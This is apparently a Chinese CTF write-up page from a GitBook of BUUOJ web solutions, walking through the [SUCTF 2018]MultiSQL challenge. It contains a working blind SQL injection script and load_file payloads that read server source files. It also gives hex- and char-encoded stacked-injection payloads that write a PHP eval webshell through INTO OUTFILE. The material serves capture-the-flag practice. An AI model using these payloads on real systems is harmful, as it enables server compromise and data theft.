🤤
BUUOJwp
  • README
  • SQL注入
    • [BSidesCF 2019]Sequel
    • [RCTF2015]EasySQL
    • [RootersCTF2019]babyWeb
    • [SUCTF 2018]MultiSQL
    • October 2019 Twice SQL Injection
    • [Black Watch 入群题]Web
    • [网鼎杯2018]Unfinish
    • [NCTF2019]SQLi
    • [CISCN2019 华北赛区 Day1 Web5]CyberPunk
    • [WUSTCTF2020]颜值成绩查询
    • [强网杯 2019]随便注
    • [b01lers2020]Life on Mars
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [SUCTF 2019]EasySQL
    • [GXYCTF2019]BabySQli
    • [GYCTF2020]Ezsqli
    • [极客大挑战 2019]EasySQL
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]BabySQL
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]FinalSQL
    • [RoarCTF 2019]Online Proxy
    • [BJDCTF2020]Easy MD5
    • [BJDCTF 2nd]简单注入
    • [网鼎杯 2018]Comment
    • [SWPU2019]Web1
    • [GYCTF2020]Blacklist
    • [SWPU2019]Web4
    • [HarekazeCTF2019]Sqlite Voting
    • [XDCTF 2015]filemanager
    • [FBCTF2019]Products Manager
    • [PwnThyBytes 2019]Baby_SQL
    • [Zer0pts2020]phpNantokaAdmin
    • [NPUCTF2020]ezlogin
  • 命令执行/代码执行
    • [De1CTF 2019]Giftbox
    • Wallbreaker_Easy
    • [GXYCTF2019]禁止套娃
    • [CISCN 2019 初赛]Love Math
    • [NESTCTF 2019]Love Math 2
    • [ISITDTU 2019]EasyPHP
    • [红明谷CTF 2021]write_shell
    • 未完成[RoarCTF 2019]Easy Calc
    • [极客大挑战 2019]RCE ME
    • EasyBypass
    • [FBCTF2019]RCEService
    • [ACTF2020 新生赛]Exec
    • [HITCON 2017]SSRFme
    • [GXYCTF2019]Ping Ping Ping
    • [SUCTF 2018]GetShell
  • XXE
    • [NCTF2019]Fake XML cookbook
    • [NCTF2019]True XML cookbook
    • [CSAWQual 2019]Web_Unagi
    • [BSidesCF 2019]SVGMagic
    • [GoogleCTF2019 Quals]Bnv
  • SSRF
    • [网鼎杯 2020 玄武组]SSRFMe
  • XSS
    • [CISCN2019 华东北赛区]Web2
    • [GWCTF 2019]mypassword
  • SSTI
    • PHP
      • [CISCN2019 华东南赛区]Web11
      • [BJDCTF2020]The mystery of ip
      • [BJDCTF2020]Cookie is so stable
    • Python
      • [GWCTF 2019]你的名字
      • [pasecactf_2019]flask_ssti
      • [FBCTF2019]Event
      • [RootersCTF2019]I_<3_Flask
      • [CSCCTF 2019 Qual]FlaskLight
      • [GYCTF2020]FlaskApp
      • [WesternCTF2018]shrine
      • [护网杯 2018]easy_tornado
  • 文件上传
    • [HarekazeCTF2019]Avatar Uploader 1
    • [SUCTF 2019]CheckIn
    • [WUSTCTF2020]CV Maker
    • [MRCTF2020]你传你🐎呢
    • [GXYCTF2019]BabyUpload
    • [极客大挑战 2019]Upload
    • [ACTF2020 新生赛]Upload
    • [XNUCA2019Qualifier]EasyPHP
    • [羊城杯2020]easyphp
    • [SUCTF 2019]EasyWeb
  • PHP
    • Laravel
      • 未完成[CISCN2019 总决赛 Day1 Web4]Laravel1
    • PHP特性
      • [RCTF 2019]Nextphp
      • [WMCTF2020]Make PHP Great Again
      • [HarekazeCTF2019]encode_and_encode
      • [安洵杯 2019]easy_web
      • [Zer0pts2020]Can you guess it?
      • [WUSTCTF2020]朴实无华
      • [BJDCTF2020]Mark loves cat
      • [MRCTF2020]Ez_bypass
      • [GWCTF 2019]枯燥的抽奖
      • [MRCTF2020]Ezaudit
      • [BJDCTF2020]EzPHP
      • [NPUCTF2020]ReadlezPHP
      • [BSidesCF 2020]Had a bad day
      • [GWCTF 2019]我有一个数据库
      • [ACTF2020 新生赛]Include
      • [HCTF 2018]WarmUp
      • [SUCTF 2018]annonymous
      • [极客大挑战 2020]Roamphp1 Welcome
      • [网鼎杯 2020 半决赛]AliceWebsite
      • [ACTF2020 新生赛]BackupFile
      • [极客大挑战 2019]BuyFlag
      • [羊城杯 2020]Blackcat
      • [羊城杯 2020]Easyphp2
      • [羊城杯 2020]EasySer
    • PHP反序列化
      • [MRCTF2020]Ezpop_Revenge
      • [HarekazeCTF2019]Easy Notes
      • bestphp's revenge
      • [SUCTF 2019]Upload Labs 2
      • [SWPUCTF2018] SimplePHP
      • [CISCN2019 华北赛区 Day1 Web1]Dropbox
      • [0CTF 2016]piapiapia
      • [安洵杯 2019]easy_serialize_php
      • [GYCTF2020]Easyphp
      • [极客大挑战 2019]PHP
      • [网鼎杯 2020 青龙组]AreUSerialz
      • [BJDCTF2020]ZJCTF,不过如此
      • [EIS 2019]EzPOP
      • [2020 新春红包题]1
      • [MRCTF2020]Ezpop
      • [ZJCTF 2019]NiZhuanSiWei
    • ThinkPHP
      • [安洵杯 2019]iamthinking
      • [GYCTF2020]EasyThinking
      • [BJDCTF 2nd]old-hack
      • [RoarCTF 2019]Simple Upload
    • PHP综合
      • [网鼎杯 2020 总决赛]Game Exp
      • [HITCON 2017]Baby^h Master PHP
      • [HFCTF2020]BabyUpload
      • [NPUCTF2020]ezinclude
      • [MRCTF2020]套娃
      • [BUUCTF 2018]Online Tool
      • [网鼎杯 2020 朱雀组]Nmap
      • [网鼎杯 2020 朱雀组]phpweb
      • [网鼎杯 2018]Fakebook
      • [强网杯 2019] UPLOAD
      • [CISCN2019 总决赛 Day2 Web1]Easyweb
      • [GKCTF 2021]easycms
      • [GXYCTF2019]BabysqliV3.0
      • [N1CTF 2018]eating_cms
      • [安洵杯 2019]不是文件上传
      • [极客大挑战 2020]Greatphp
      • [极客大挑战 2020]Roamphp2-Myblog
      • [蓝帽杯 2021]One Pointer PHP
      • [BJDCTF2020]EzPHP
      • [CISCN2021 Quals]upload
  • Python
    • 逻辑漏洞
      • [DDCTF 2019]homebrew event loop
      • [CISCN2019 华北赛区 Day1 Web2]ikun
    • Flask
      • [HCTF 2018]Hideandseek
      • [SWPU2019]Web3
      • [watevrCTF-2019]Supercalc
      • [HCTF 2018]admin
      • [De1CTF 2019]SSRF Me
      • [CISCN2019 总决赛 Day1 Web3]Flask Message Board(*)
      • [CISCN2019 华东南赛区]Web4
      • [CISCN2019 华东南赛区]Double Secret
      • [网鼎杯 2020 白虎组]PicDown
      • [PASECA2019]honey_shop
      • [HFCTF 2021 Final]easyflask
    • 反序列化
      • [watevrCTF-2019]Pickle Store
  • Java
    • [网鼎杯 2020 朱雀组]Think Java
    • [NPUCTF2020]web🐕
    • [网鼎杯 2020 青龙组]filejava
    • [RoarCTF 2019]Easy Java
  • JavaScript
    • [GYCTF2020]Ez_Express
    • [网鼎杯 2020 青龙组]notes
    • [NPUCTF2020]验证🐎
    • [GYCTF2020]Node Game
    • [HITCON 2016]Leaking
    • [HFCTF2020]JustEscape
    • [FireshellCTF2020]ScreenShooter
    • [HFCTF2020]EasyLogin
  • 未分类
    • Unicode安全性
      • [SUCTF 2019]Pythonginx
      • [ASIS 2019]Unicorn shop
    • HTTP问题
      • [极客大挑战 2019]Secret File
      • [极客大挑战 2019]Http
      • [MRCTF2020]PYWebsite
      • [BSidesCF 2019]Kookie
      • [BSidesCF 2020]Hurdles
      • [watevrCTF-2019]Cookie Store
    • [b01lers2020]Space Noodles
    • [BSidesCF 2020]Cards
    • [BSidesCF 2019]Mixer
    • [BSidesCF 2019]Pick Tac Toe
    • [BSidesCF 2019]Futurella
    • [RootersCTF2019]ImgXweb
    • [CSAWQual 2016]i_got_id
    • [Windows][HITCON 2019]Buggy_Net
    • [极客大挑战 2019]Knife
    • [极客大挑战 2019]Havefun
    • [GXYCTF2019]StrongestMind
    • [b01lers2020]Welcome to Earth
    • [FireshellCTF2020]Caas
    • [BJDCTF2020]EasySearch
    • [SCTF2019]Flag Shop
    • [强网杯 2019]高明的黑客
    • virink_2019_files_share
由 GitBook 提供支持
在本页
  • [SUCTF 2018]MultiSQL
  • 考点
  • wp
  • 小结
在GitHub上编辑
  1. SQL注入

[SUCTF 2018]MultiSQL

上一页[RootersCTF2019]babyWeb下一页October 2019 Twice SQL Injection

最后更新于3年前

[SUCTF 2018]MultiSQL

考点

  • SQL盲注

  • mysqli_store_result 导致堆叠注入

  • 预编译写shell

  • 二次注入写shell

wp

先随便注册登录一下,能用的功能只有用户信息查看和头像上传。头像上传是写死的文件,但是说明favicon/ 这个目录是可写

在用户信息那里是很明显的注入点

URL为http://0a4b5eec-1e86-4b36-9ed6-e19c73dae811.node4.buuoj.cn:81/user/user.php?id=2,并且id=1是admin的账号,直接尝试异或id=0^1,发现返回成功,尝试0^(ascii(substr((select(database())),1,1))>0),发现失败,什么也不返回,应该是ban了字符串,再尝试0^(ascii(substr((database()),1,1))>0),还是失败,再进行函数替换,用mid替换substr,0^(ascii(mid((database()),1,1))>0) ,这次成功了。

可以用脚本试一下,数据库名字是ctf,但是过滤了select,基本上无缘常规注入了

import requests
import time
url = 'http://59d00aaf-0e45-4acc-af66-16b0cf3321b4.node4.buuoj.cn:81/user/user.php?id=' 

cookies = {
    'UM_distinctid': '17f6418dc82797-043fc01b50c257-4c3e227d-384000-17f6418dc83b77',
    'PHPSESSID': 'bo7n48i5v07nevnm1qa3hajup3',
}

def get_database():
    flag = ''
    for i in range(1, 50):
        low = 32
        high = 126
        mid = (low+high)//2
        print(flag)
        while low < high:
            time.sleep(0.2)
            payload = f"0^(ascii(mid((database()),{i},1))>{mid})"
            url_t = url + payload
            r = requests.get(url=url_t,cookies=cookies)
            if len(r.text)==1959:
                high = mid
            if len(r.text)==1975:
                low = mid + 1
            mid = (low+high)//2
            
            if low == high:
                flag = flag + chr(low)
                break
get_database()

又读取了一下版本,是10.0.34-MariaDB,存在布尔盲注,再去试试其他的东西,比如hex配合load_file 进行文件读取,测试一下

0^hex(1)
0^char(1)
这两个都没有返回空白

那可以试试hex(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)),相当于hex(load_file('/var/www/html/index.php'))

用盲注脚本跑一下,

payload = f"0^(ascii(mid((hex(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870))),{i},1))>{mid})"

然后读取bwvs_config/sys_config.php

<?php 
require_once('bwvs_config/sys_config.php');
require_once('header.php');
?>
	<html>
******
	</html>

/var/www/html/bwvs_config/sys_config.php

<?php
ini_set('display_errors',0);
error_reporting(E_ALL | E_STRICT);
header("Content-type: text/html; charset=utf-8");
define("Host", "127.0.0.1");
define("User","suctf");
define("Password","suctf");
define("DateName","ctf");
$connect = mysqli_connect(Host,User,Password,DateName);
if(!$connect)
{
	echo mysqli_error($connect);
	die('mysql connect error !');
}else{
	$sql = "set names utf8";
	mysqli_query($connect,$sql);
}
session_start();
//根目录
$basedir = ''; 
//载入函数库
include_once('waf.php');
?>

/var/www/html/bwvs_config/waf.php 可以看到ban了很多字符串,基本锁死了注入。但是预编译的注入没有过滤set、prepare和execute,可以往这个方向考虑

<?php
	
	function waf($str){
		$black_str = "/(and|or|union|sleep|select|substr|order|left|right|order|by|where|rand|exp|updatexml|insert|update|dorp|delete|[|]|[&])/i";
		$str = preg_replace($black_str, "@@",$str);
		return addslashes($str);
	}
	

?>

然后读取/var/www/html/user/user.php

<?php
include_once('../bwvs_config/sys_config.php');

if (isset($_SESSION['user_name'])) {
	include_once('../header.php');
	if (!isset($SESSION['user_id'])) {
		$sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_name ="."'{$_SESSION['user_name']}'";
		$data = mysqli_query($connect,$sql) or die('Mysql Error!!');
		$result = mysqli_fetch_array($data);
		$_SESSION['user_id'] = $result['DWVS_user_id'];
	}

	$html_avatar = htmlspecialchars($_SESSION['user_favicon']);
	
	
	if(isset($_GET['id'])){
		$id=waf($_GET['id']);
		$sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_id =".$id;
		$data = mysqli_multi_query($connect,$sql) or die();
		
		$result = mysqli_store_result($connect);
		$row = mysqli_fetch_row($result);
		echo '<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>注册时间:".$row[4]."</h3>";
		mysqli_free_result($result);
		die();
	}
	mysqli_close($connect);
?>
<div class="row">
	<div style="float:left;">
		<img src="<?php echo $html_avatar?>" width="100" height="100" class="img-thumbnail" >
		<div><?php echo "你好,".$_SESSION['user_name']?>
		</div>	
	</div>
	
	<div style="float:right;padding-right:900px">
		<div><a href="./user.php?id=<?php echo $_SESSION['user_id'];?>"><button type="button" class="btn btn-primary">用户信息</button></a></div>
		<br />
		<div><a href="edit.php"><button type="button" class="btn btn-primary">编辑头像</button></a></div>
		<br/>
		<div><a href="logout.php"><button type="button" class="btn btn-primary">退出</button></a></div><br /><br /><br /><br />
	</div>
</div>
<?php 
	require_once('../Trim.php');
}
else {
	not_find($_SERVER['PHP_SELF']);
}
?>

用了mysqli_store_result,会导致堆叠注入,结合前面的预编译可以写shell

1;set @sql=0x53454c45435420273c3f70687020406576616c28245f504f53545b615d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f7368656c6c2e70687027;prepare x from @sql;execute x;

执行的sql语句

SELECT '<?php @eval($_POST[a]);?>' into outfile '/var/www/html/favicon/shell.php'

也可以用char函数写shell

1;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare payload from @sql;execute payload;

还有一种解法是利用二次注入写shell

小结

  1. 遇到SQL过滤时要试试关键字字典

  2. 过滤多的时候可能是堆叠注入或者用load_file

  3. MySQL中转换字符串可以用hex也可以用char

  4. 注入时要判断不同结果对应的页面